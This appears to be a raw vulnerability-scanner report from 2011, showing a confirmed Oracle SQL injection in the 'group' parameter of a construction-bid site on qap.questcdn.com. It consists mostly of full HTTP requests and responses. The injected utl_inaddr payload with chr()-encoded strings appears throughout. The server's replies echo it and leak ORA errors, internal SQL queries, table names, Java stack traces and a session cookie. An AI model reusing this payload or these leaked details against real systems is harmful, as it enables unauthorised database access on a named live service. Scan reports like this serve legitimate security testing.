href="/qap/projects/prj_browse/ipp_prj_view.html?current_sub_tab=view_projects&group=%28utl_inaddr.get_host_address%28%28select+chr%2895%29%7C%7Cchr%2833%29%7C%7Cchr%2864%29%7C%7Cchr%2851%29%7C%7Cchr%28100%29%7C%7Cchr%28105%29%7C%7Cchr%28108%29%7C%7Cchr%28101%29%7C%7Cchr%28109%29%7C%7Cchr%28109%29%7C%7Cchr%2897%29+from+DUAL%29%29%29&provider=765295&sortType=1" >Project Results</a> </td> <td> </td> </tr> <tr> <td class="menu_link" width="200"> <a href="/qap/projects/prj_browse/ipp_prj_browse.html?group=%28utl_inaddr.get_host_address%28%28select+chr%2895%29%7C%7Cchr%2833%29%7C%7Cchr%2864%29%7C%7Cchr%2851%29%7C%7Cchr%28100%29%7C%7Cchr%28105%29%7C%7Cchr%28108%29%7C%7Cchr%28101%29%7C%7Cchr%28109%29%7C%7Cchr%28109%29%7C%7Cchr%2897%29+from+DUAL%29%29%29&provider=765295" >Click Here To Sort By Category</a> </td> </tr> </table> </td></tr><tr><!--BGP1--> <td height="100%"> <table height="100%" cellpadding="0" cellspacing="0"> <tr> <td class="prj_tree" width="275" height="100%" valign="top"> <table width="244" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr height="20"> <td width="14" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="10" border="0"></td> <td width="20" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="20" border="0"></td> <td width="210" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="210" border="0"></td> </tr> <font color="#FF0000">2011/03/01 14:03:36.983 [ 1] (TP-Processor1839) Problem including template component SQLLOOP query=" SELECT TO_CHAR(j.bid_date,'MM/DD/YYYY'), COUNT(j.bid_date) n_projects FROM job_categories jc, jobs j, job_types jt, provider_group pg WHERE jc.job_category_no = j.job_category_no(+) AND j.job_type_no = jt.job_type_no (+) AND ( jt.name <> 'hidden' OR jt.name IS NULL ) AND j.bid_date >= SYSDATE AND ( j.provider_account_no = pg.provider_no OR j.q_ipp_owner = pg.provider_no ) AND pg.provider_group_no = <?p:group?> GROUP BY TO_CHAR(j.bid_date,'MM/DD/YYYY') ORDER BY TO_CHAR(j.bid_date,'MM/DD/YYYY') asc " name="q1"<pre><a href="http://java.sun.com/products/jdk/1.2/docs/api/java/sql/SQLException.html" target="new">java.sql.SQLException</a>: ORA-29257: host _!@3dilemma unknown ORA-06512: at "SYS.UTL_INADDR", line 19 ORA-06512: at "SYS.UTL_INADDR", line 40 ORA-06512: at line 1 while executing: SELECT TO_CHAR(j.bid_date,'MM/DD/YYYY'), COUNT(j.bid_date) n_projects FROM job_categories jc, jobs j, job_types jt, provider_group pg WHERE jc.job_category_no = j.job_category_no(+) AND j.job_type_no = jt.job_type_no (+) AND ( jt.name <> 'hidden' OR jt.name IS NULL ) AND j.bid_date >= SYSDATE AND ( j.provider_account_no = pg.provider_no OR j.q_ipp_owner = pg.provider_no ) AND pg.provider_group_no = (utl_inaddr.get_host_address((select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))) GROUP BY TO_CHAR(j.bid_date,'MM/DD/YYYY') ORDER BY TO_CHAR(j.bid_date,'MM/DD/YYYY') asc ORA-06512: at "SYS.UTL_INADDR", line 19ORA-06512: at "SYS.UTL_INADDR", line 40ORA-06512: at line 1 at oracle.jdbc.dbaccess.DBError.throwSqlException(DBError.java:134) at oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:289) at oracle.jdbc.ttc7.Oall7.receive(Oall7.java:573) at oracle.jdbc.ttc7.TTC7Protocol.doOall7(TTC7Protocol.java:1891) at oracle.jdbc.ttc7.TTC7Protocol.fetch(TTC7Protocol.java:1198) at oracle.jdbc.driver.OracleStatement.doExecuteQuery(OracleStatement.java:2400) at oracle.jdbc.driver.OracleStatement.doExecuteWithTimeout(OracleStatement.java:2672) at oracle.jdbc.driver.OracleStatement.executeQuery(OracleStatement.java:572) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:531) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:622) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:91) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.components.IfComponent.includeInternal(IfComponent.java:126) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:110) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.Template.includeInternal(Template.java:86) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.Template.include(Template.java:59) at dynamic.intraframe.engine.BaseApplicationContext.handleTemplate(BaseApplicationContext.java:1024) at dynamic.intraframe.engine.BaseApplicationContext.handle(BaseApplicationContext.java:844) at dynamic.intraframe.engine.BaseServlet.service(BaseServlet.java:237) at javax.servlet.http.HttpServlet.service(HttpServlet.java:802) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:269) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:213) at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:174) at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:127) at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:117) at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:108) at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:151) at org.apache.jk.server.JkCoyoteHandler.invoke(JkCoyoteHandler.java:200) at org.apache.jk.common.HandlerRequest.invoke(HandlerRequest.java:283) at org.apache.jk.common.ChannelSocket.invoke(ChannelSocket.java:773) at org.apache.jk.common.ChannelSocket.processConnection(ChannelSocket.java:703) at org.apache.jk.common.ChannelSocket$SocketConnection.runIt(ChannelSocket.java:895) at org.apache.tomcat.util.threads.ThreadPool$ControlRunnable.run(ThreadPool.java:689) at java.lang.Thread.run(Thread.java:619)</pre></font> <tr> <td colspan="3"> </td> </tr> <tr> <td width="14"> </td> <td colspan="2" width="230"> <span class="copyright">© 1999-2010 Quest Construction Data Network, LLC</span> </td> </tr> <tr> <td colspan="3" height="100%"> </td> </tr> </table> </td><!--BGP5--> <td class="body" width="100%" height="100%" valign="top"> <h3>SEARCH PROJECTS</h3> <form name="frmSearch" action="/qap/action/IPPprojectSearch" method="post"> <input type="hidden" name="SearchType" value="1"> <input type="hidden" name="SQL" value=""> <input type="hidden" name="provider" value="765295"> <input type="hidden" name="group" value="(utl_inaddr.get_host_address((select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL)))"> <table width="590" border="0" cellspacing="0"> <tr> <td class="search_label" width="240">QuestCDN eBidDoc™ Number</td> <td class="search_label" width="240">Password (If Required)</td> <td width="100" class="bodygrn-bold"> </td> </tr> <tr> <td><input type="text" value="0" name="ProjectNo" size="23" style="font-family: Courier; font-size:14px" value=""></td> <td><input type="password" name="password" size="20" style="font-family: Courier; font-size:14px"></td> <td><a href="#" onclick="document.frmSearch.submit(); return false;">Search</a></td> </tr> <tr> <td colspan="2" class="body"> <table border="0" cellspacing="0" cellpadding="0" class="body"> <tr> <td style="line-height:5px"> </td> </tr> <tr> <td> Using the <b>QuestCDN eBidDoc™ Number</b> to access the project advertisement and plan documents is an easy task. Just enter the specific <b>QuestCDN eBidDoc™ Number</b> in the eBidDoc field above and click the 'Search' button. This will take you directly to the full text advertisement for that project. Don't forget to enter the password if you are trying to access a protected or hidden project! </td> </tr> </table> </td> </tr> </table> </td> </tr> </table> </td></tr><tr> <td></ipp/includes/ipp_coon_rapids_footer.html> </td></tr></table></body></html>
Date: Tue, 01 Mar 2011 20:03:15 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:03:15 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 10911
Content-Type: text/html;charset=utf-8
<!--$Header: /home/cvsroot/ipp.questcdn.com/www/projects/prj_browse/ipp_prj_browse_letting_date.html,v 1.4 2005/09/13 17:42:49 gkloke Exp $--><!-- webapps/ipp/projects/prj_browse/ipp_prj_browse_letting_date.html --><!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html;charset=ISO-8859-1"><title>Bartlett & West - Projects</title><link href="/qap//includes/ipp_bartlett_west.css" rel="stylesheet" media="screen"></head><body><table class="container" cellpadding="0" cellspacing="0" width="100%" height="100%"><tr> <td><img src="/qap/images/bartlett_west.jpg" alt="Bartlett West"> </td></tr><tr> <td> <table class="menubar" cellpadding="0" cellspacing="0" width="100%"> <tr> <td class="menu_button" width="150"> <a href="/qap/projects/prj_browse/ipp_prj_browse_letting_date.html?group=%28utl_inaddr.get_host_address%28%28select+chr%2895%29%7C%7Cchr%2833%29%7C%7Cchr%2864%29%7C%7Cchr%2851%29%7C%7Cchr%28100%29%7C%7Cchr%28105%29%7C%7Cchr%28108%29%7C%7Cchr%28101%29%7C%7Cchr%28109%29%7C%7Cchr%28109%29%7C%7Cchr%2897%29+from+DUAL%29%29%29&provider=765295&sortType=1" >Browse Projects</a> </td> <td class="menu_button" width="150"> <a href="/qap/projects/prj_browse/ipp_prj_view.html?current_sub_tab=view_projects&group=%28utl_inaddr.get_host_address%28%28select+chr%2895%29%7C%7Cchr%2833%29%7C%7Cchr%2864%29%7C%7Cchr%2851%29%7C%7Cchr%28100%29%7C%7Cchr%28105%29%7C%7Cchr%28108%29%7C%7Cchr%28101%29%7C%7Cchr%28109%29%7C%7Cchr%28109%29%7C%7Cchr%2897%29+from+DUAL%29%29%29&provider=765295&sortType=1" >Project Results</a> </td> <td> </td> </tr> <tr> <td class="menu_link" width="200"> <a href="/qap/projects/prj_browse/ipp_prj_browse.html?group=%28utl_inaddr.get_host_address%28%28select+chr%2895%29%7C%7Cchr%2833%29%7C%7Cchr%2864%29%7C%7Cchr%2851%29%7C%7Cchr%28100%29%7C%7Cchr%28105%29%7C%7Cchr%28108%29%7C%7Cchr%28101%29%7C%7Cchr%28109%29%7C%7Cchr%28109%29%7C%7Cchr%2897%29+from+DUAL%29%29%29&provider=765295" >Click Here To Sort By Category</a> </td> </tr> </table> </td></tr><tr><!--BGP1--> <td height="100%"> <table height="100%" cellpadding="0" cellspacing="0"> <tr> <td class="prj_tree" width="275" height="100%" valign="top"> <table width="244" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr height="20"> <td width="14" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="10" border="0"></td> <td width="20" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="20" border="0"></td> <td width="210" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="210" border="0"></td> </tr> <font color="#FF0000">2011/03/01 14:03:36.983 [ 1] (TP-Processor1839) Problem including template component SQLLOOP query=" SELECT TO_CHAR(j.bid_date,'MM/DD/YYYY'), COUNT(j.bid_date) n_projects FROM job_categories jc, jobs j, job_types jt, provider_group pg WHERE jc.job_category_no = j.job_category_no(+) AND j.job_type_no = jt.job_type_no (+) AND ( jt.name <> 'hidden' OR jt.name IS NULL ) AND j.bid_date >= SYSDATE AND ( j.provider_account_no = pg.provider_no OR j.q_ipp_owner = pg.provider_no ) AND pg.provider_group_no = <?p:group?> GROUP BY TO_CHAR(j.bid_date,'MM/DD/YYYY') ORDER BY TO_CHAR(j.bid_date,'MM/DD/YYYY') asc " name="q1"<pre><a href="http://java.sun.com/products/jdk/1.2/docs/api/java/sql/SQLException.html" target="new">java.sql.SQLException</a>: ORA-29257: host _!@3dilemma unknown ORA-06512: at "SYS.UTL_INADDR", line 19 ORA-06512: at "SYS.UTL_INADDR", line 40 ORA-06512: at line 1 while executing: SELECT TO_CHAR(j.bid_date,'MM/DD/YYYY'), COUNT(j.bid_date) n_projects FROM job_categories jc, jobs j, job_types jt, provider_group pg WHERE jc.job_category_no = j.job_category_no(+) AND j.job_type_no = jt.job_type_no (+) AND ( jt.name <> 'hidden' OR jt.name IS NULL ) AND j.bid_date >= SYSDATE AND ( j.provider_account_no = pg.provider_no OR j.q_ipp_owner = pg.provider_no ) AND pg.provider_group_no = (utl_inaddr.get_host_address((select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))) GROUP BY TO_CHAR(j.bid_date,'MM/DD/YYYY') ORDER BY TO_CHAR(j.bid_date,'MM/DD/YYYY') asc ORA-06512: at "SYS.UTL_INADDR", line 19ORA-06512: at "SYS.UTL_INADDR", line 40ORA-06512: at line 1 at oracle.jdbc.dbaccess.DBError.throwSqlException(DBError.java:134) at oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:289) at oracle.jdbc.ttc7.Oall7.receive(Oall7.java:573) at oracle.jdbc.ttc7.TTC7Protocol.doOall7(TTC7Protocol.java:1891) at oracle.jdbc.ttc7.TTC7Protocol.fetch(TTC7Protocol.java:1198) at oracle.jdbc.driver.OracleStatement.doExecuteQuery(OracleStatement.java:2400) at oracle.jdbc.driver.OracleStatement.doExecuteWithTimeout(OracleStatement.java:2672) at oracle.jdbc.driver.OracleStatement.executeQuery(OracleStatement.java:572) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:531) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:622) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:91) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.components.IfComponent.includeInternal(IfComponent.java:126) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:110) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.Template.includeInternal(Template.java:86) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.Template.include(Template.java:59) at dynamic.intraframe.engine.BaseApplicationContext.handleTemplate(BaseApplicationContext.java:1024) at dynamic.intraframe.engine.BaseApplicationContext.handle(BaseApplicationContext.java:844) at dynamic.intraframe.engine.BaseServlet.service(BaseServlet.java:237) at javax.servlet.http.HttpServlet.service(HttpServlet.java:802) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:269) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:213) at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:174) at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:127) at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:117) at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:108) at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:151) at org.apache.jk.server.JkCoyoteHandler.invoke(JkCoyoteHandler.java:200) at org.apache.jk.common.HandlerRequest.invoke(HandlerRequest.java:283) at org.apache.jk.common.ChannelSocket.invoke(ChannelSocket.java:773) at org.apache.jk.common.ChannelSocket.processConnection(ChannelSocket.java:703) at org.apache.jk.common.ChannelSocket$SocketConnection.runIt(ChannelSocket.java:895) at org.apache.tomcat.util.threads.ThreadPool$ControlRunnable.run(ThreadPool.java:689) at java.lang.Thread.run(Thread.java:619)</pre></font> <tr> <td colspan="3"> </td> </tr> <tr> <td width="14"> </td> <td colspan="2" width="230"> <span class="copyright">© 1999-2010 Quest Construction Data Network, LLC</span> </td> </tr> <tr> <td colspan="3" height="100%"> </td> </tr> </table> </td><!--BGP5--> <td class="body" width="100%" height="100%" valign="top"> <h3>SEARCH PROJECTS</h3> <form name="frmSearch" action="/qap/action/IPPprojectSearch" method="post"> <input type="hidden" name="SearchType" value="1"> <input type="hidden" name="SQL" value=""> <input type="hidden" name="provider" value="765295"> <input type="hidden" name="group" value="(utl_inaddr.get_host_address((select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL)))"> <table width="590" border="0" cellspacing="0"> <tr> <td class="search_label" width="240">QuestCDN eBidDoc™ Number</td> <td class="search_label" width="240">Password (If Required)</td> <td width="100" class="bodygrn-bold"> </td> </tr> <tr> <td><input type="text" value="0" name="ProjectNo" size="23" style="font-family: Courier; font-size:14px" value=""></td> <td><input type="password" name="password" size="20" style="font-family: Courier; font-size:14px"></td> <td><a href="#" onclick="document.frmSearch.submit(); return false;">Search</a></td> </tr> <tr> <td colspan="2" class="body"> <table border="0" cellspacing="0" cellpadding="0" class="body"> <tr> <td style="line-height:5px"> </td> </tr> <tr> <td> Using the <b>QuestCDN eBidDoc™ Number</b> to access the project advertisement and plan documents is an easy task. Just enter the specific <b>QuestCDN eBidDoc™ Number</b> in the eBidDoc field above and click the 'Search' button. This will take you directly to the full text advertisement for that project. Don't forget to enter the password if you are trying to access a protected or hidden project! </td> </tr> </table> </td> </tr> </table> </td> </tr> </table> </td></tr><tr> <td></ipp/includes/ipp_coon_rapids_footer.html> </td></tr></table></body></html>
|
- /qap/projects/prj_browse/ipp_prj_view.html
/qap/projects/prj_browse/ipp_prj_view.html CONFIRMED |
Parameters
| Parameter | Type | Value |
| current_sub_tab | GET | view_projects |
| group | GET | (utl_inaddr.get_host_address((select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))) |
| provider | GET | 765295 |
| sortType | GET | 1 |
Request
GET /qap/projects/prj_browse/ipp_prj_view.html?current_sub_tab=view_projects&group=(utl_inaddr.get_host_address((select+chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(51)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)+from+DUAL)))&provider=765295&sortType=1 HTTP/1.1
Referer: http://qap.questcdn.com/qap/projects/prj_browse/ipp_prj_browse_letting_date.html?group=11&provider=765295
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Cookie: sessionIdentifier=/177428174825690686
Accept-Encoding: gzip, deflate
Referer: http://qap.questcdn.com/qap/projects/prj_browse/ipp_prj_browse_letting_date.html?group=11&provider=765295
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Cookie: sessionIdentifier=/177428174825690686
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 20:04:03 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:04:03 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 8585
Content-Type: text/html;charset=utf-8
<script language="javascript1.1">function DownloadBidTab(sjobNbr){ req_window = window.open ("/qap/projects/prj_browse/prj_download_bid_tab.html?job_no=" + sjobNbr,"","height=300,width=500");}function ShowViewResults(jobPK){ var w = window.open('/qap/projects/prj_browse/ipp_prj_view.html?ShowProjectDetails=TRUE&viewOnly=TRUE&group=(utl_inaddr.get_host_address((select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL)))&provider=765295&jobPK=' + jobPK, 'ViewResults', 'status,resizable,scrollbars,width=700,height=600'); w.focus();}function PrintPage(){ window.print();}</script><html><head><meta http-equiv="content-type" content="text/html;charset=ISO-8859-1"><title>Bartlett & West - Projects</title><link href="/qap//includes/ipp_bartlett_west.css" rel="stylesheet" media="screen"></head><body><table class="container" cellpadding="0" cellspacing="0" width="100%" height="100%"><tr> <td><img src="/qap/images/bartlett_west.jpg" alt="Bartlett West"> </td></tr><tr> <td> <table class="menubar" cellpadding="0" cellspacing="0" width="100%"> <tr> <td class="menu_button" width="150"> <a href="/qap/projects/prj_browse/ipp_prj_browse.html?group=%28utl_inaddr.get_host_address%28%28select+chr%2895%29%7C%7Cchr%2833%29%7C%7Cchr%2864%29%7C%7Cchr%2851%29%7C%7Cchr%28100%29%7C%7Cchr%28105%29%7C%7Cchr%28108%29%7C%7Cchr%28101%29%7C%7Cchr%28109%29%7C%7Cchr%28109%29%7C%7Cchr%2897%29+from+DUAL%29%29%29&provider=765295" >Browse Projects</a> </td> <td class="menu_button" width="150"> <a href="/qap/projects/prj_browse/ipp_prj_view.html?current_sub_tab=view_projects&group=%28utl_inaddr.get_host_address%28%28select+chr%2895%29%7C%7Cchr%2833%29%7C%7Cchr%2864%29%7C%7Cchr%2851%29%7C%7Cchr%28100%29%7C%7Cchr%28105%29%7C%7Cchr%28108%29%7C%7Cchr%28101%29%7C%7Cchr%28109%29%7C%7Cchr%28109%29%7C%7Cchr%2897%29+from+DUAL%29%29%29&provider=765295" ><font color=red size=2 >Project Results</font></a> </td> <td> </td> </tr> </table> </td></tr><tr> <td width="100%" height="100%"> <table width="100%" height="100%" cellpadding="0" cellspacing="0"> <tr> <td class="results_tree" width="275" height="100%" valign="top"> <table width="244" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr height="20"> <td width="10"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="10" border="0"></td> <td width="40"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="20" border="0"></td> <td width="170"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="210" border="0"></td> </tr> <font color="#FF0000">2011/03/01 14:04:24.471 [ 1] (TP-Processor1681) Problem including template component SQLLOOP query=" SELECT j.job_no, DECODE(j.bid_date, null, null, to_char(j.bid_date,'MM/DD/YYYY')), j.name FROM jobs j WHERE j.job_no in ( SELECT DISTINCT j.job_no FROM jobs j, plan_holders ph, provider_group pg WHERE j.job_no = ph.job_no (+) AND (ph.bid_amount IS NOT NULL or j.bid_tab_file_name is not null) AND ( j.provider_account_no = pg.provider_no OR j.q_ipp_owner = pg.provider_no ) AND pg.provider_group_no=<?p:group?>) ORDER BY j.bid_date asc " name="Projects"<pre><a href="http://java.sun.com/products/jdk/1.2/docs/api/java/sql/SQLException.html" target="new">java.sql.SQLException</a>: ORA-29257: host _!@3dilemma unknown ORA-06512: at "SYS.UTL_INADDR", line 19 ORA-06512: at "SYS.UTL_INADDR", line 40 ORA-06512: at line 1 while executing: SELECT j.job_no, DECODE(j.bid_date, null, null, to_char(j.bid_date,'MM/DD/YYYY')), j.name FROM jobs j WHERE j.job_no in ( SELECT DISTINCT j.job_no FROM jobs j, plan_holders ph, provider_group pg WHERE j.job_no = ph.job_no (+) AND (ph.bid_amount IS NOT NULL or j.bid_tab_file_name is not null) AND ( j.provider_account_no = pg.provider_no OR j.q_ipp_owner = pg.provider_no ) AND pg.provider_group_no=(utl_inaddr.get_host_address((select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL)))) ORDER BY j.bid_date asc ORA-06512: at "SYS.UTL_INADDR", line 19ORA-06512: at "SYS.UTL_INADDR", line 40ORA-06512: at line 1 at oracle.jdbc.dbaccess.DBError.throwSqlException(DBError.java:134) at oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:289) at oracle.jdbc.ttc7.Oall7.receive(Oall7.java:573) at oracle.jdbc.ttc7.TTC7Protocol.doOall7(TTC7Protocol.java:1891) at oracle.jdbc.ttc7.TTC7Protocol.fetch(TTC7Protocol.java:1198) at oracle.jdbc.driver.OracleStatement.doExecuteQuery(OracleStatement.java:2400) at oracle.jdbc.driver.OracleStatement.doExecuteWithTimeout(OracleStatement.java:2672) at oracle.jdbc.driver.OracleStatement.executeQuery(OracleStatement.java:572) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:531) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:622) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:91) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.components.IfComponent.includeInternal(IfComponent.java:126) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:110) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.Template.includeInternal(Template.java:86) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.Template.include(Template.java:59) at dynamic.intraframe.engine.BaseApplicationContext.handleTemplate(BaseApplicationContext.java:1024) at dynamic.intraframe.engine.BaseApplicationContext.handle(BaseApplicationContext.java:844) at dynamic.intraframe.engine.BaseServlet.service(BaseServlet.java:237) at javax.servlet.http.HttpServlet.service(HttpServlet.java:802) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:269) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:213) at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:174) at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:127) at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:117) at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:108) at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:151) at org.apache.jk.server.JkCoyoteHandler.invoke(JkCoyoteHandler.java:200) at org.apache.jk.common.HandlerRequest.invoke(HandlerRequest.java:283) at org.apache.jk.common.ChannelSocket.invoke(ChannelSocket.java:773) at org.apache.jk.common.ChannelSocket.processConnection(ChannelSocket.java:703) at org.apache.jk.common.ChannelSocket$SocketConnection.runIt(ChannelSocket.java:895) at org.apache.tomcat.util.threads.ThreadPool$ControlRunnable.run(ThreadPool.java:689) at java.lang.Thread.run(Thread.java:619)</pre></font> </table> </td> <td class="results_detail" valign="top" width="100%"> </td> </tr> </table> </td></tr></table></body></html>
Date: Tue, 01 Mar 2011 20:04:03 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:04:03 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 8585
Content-Type: text/html;charset=utf-8
<script language="javascript1.1">function DownloadBidTab(sjobNbr){ req_window = window.open ("/qap/projects/prj_browse/prj_download_bid_tab.html?job_no=" + sjobNbr,"","height=300,width=500");}function ShowViewResults(jobPK){ var w = window.open('/qap/projects/prj_browse/ipp_prj_view.html?ShowProjectDetails=TRUE&viewOnly=TRUE&group=(utl_inaddr.get_host_address((select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL)))&provider=765295&jobPK=' + jobPK, 'ViewResults', 'status,resizable,scrollbars,width=700,height=600'); w.focus();}function PrintPage(){ window.print();}</script><html><head><meta http-equiv="content-type" content="text/html;charset=ISO-8859-1"><title>Bartlett & West - Projects</title><link href="/qap//includes/ipp_bartlett_west.css" rel="stylesheet" media="screen"></head><body><table class="container" cellpadding="0" cellspacing="0" width="100%" height="100%"><tr> <td><img src="/qap/images/bartlett_west.jpg" alt="Bartlett West"> </td></tr><tr> <td> <table class="menubar" cellpadding="0" cellspacing="0" width="100%"> <tr> <td class="menu_button" width="150"> <a 